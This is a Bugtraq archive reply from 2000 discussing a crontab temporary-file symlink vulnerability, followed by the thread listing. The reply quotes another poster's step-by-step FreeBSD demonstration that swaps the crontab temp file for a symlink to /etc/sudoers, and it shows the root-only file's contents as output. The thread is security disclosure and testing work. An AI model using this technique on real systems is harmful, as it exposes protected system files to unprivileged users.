Bugtraq mailing list archives
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
From: Andrey Alekseyev <uitm () ZENON NET>
Date: Wed, 25 Oct 2000 16:07:23 +0400
Well, performing a quick test I was unable to reproduce example below with crontab that comes with FreeBSD 4.1-RELEASE. I was only able to install files containing more than 3 characters in a line and only if these were digits. Otherwise crontab complains about line format. I was also able to successfully install a file with all lines commented out with '#' (local /etc/inetd.conf). Of course, it's possible to import /etc/crontab mode 0600.
Hi, Tested on 4.0-RELEASE FreeBSD 4.0-RELEASE #9 4.1-RELEASE FreeBSD 4.1-RELEASE #1: Can read any file wich start with comment simbol (#) $ ls -l /etc/sudoers -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers $ id uid=1002(alf) gid=1002(alf) groups=1002(alf) $ crontab -e ~ ~ ~ /tmp/crontab.hLmjTbK417 :!sh [ #### Make simbolik link]rm /tmp/crontab.hLmjTbK417 ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417 exit[ #### quit vi ] /tmp/crontab.hLmjTbK417 crontab: installing new crontab [ #### start crontab editor] $ crontab -e [####### See in vi] # sudoers file. # # This file MUST be edited with the 'visudo' command as root. # # See the sudoers man page for the details on how to write a sudoers file. # # Host alias specification # User alias specification # Cmnd alias specification # User privilege specification root ALL=(ALL) ALL alf ALL=(ALL) ALL ~ ~ ~ If file started with no # then crontab sad "/tmp/crontab.GAeNMP1357":2: bad minute crontab: errors in crontab file, can't install -- ------ Alf Delems<alf () isd memonet ru>
-- Andrey Alekseyev. Zenon N.S.P.
Current thread:
- [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability Kyong-won Cho (Oct 24)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Sergey Nenashev (Oct 25)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Fabio Pietrosanti (naif) (Oct 26)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Kris Kennaway (Oct 27)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Fabio Pietrosanti (naif) (Oct 27)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Casper Dik (Oct 27)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Bill Sommerfeld (Oct 27)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Fabio Pietrosanti (naif) (Oct 26)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Andrey Alekseyev (Oct 26)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Robert Watson (Oct 27)
- Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Sergey Nenashev (Oct 25)